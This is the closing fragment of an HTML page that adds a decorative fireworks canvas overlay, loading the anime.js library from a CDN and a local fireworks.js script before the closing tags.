   <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
   <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
   <script type="text/javascript" src="/js/fireworks.js"></script>
  


</body>
</html>
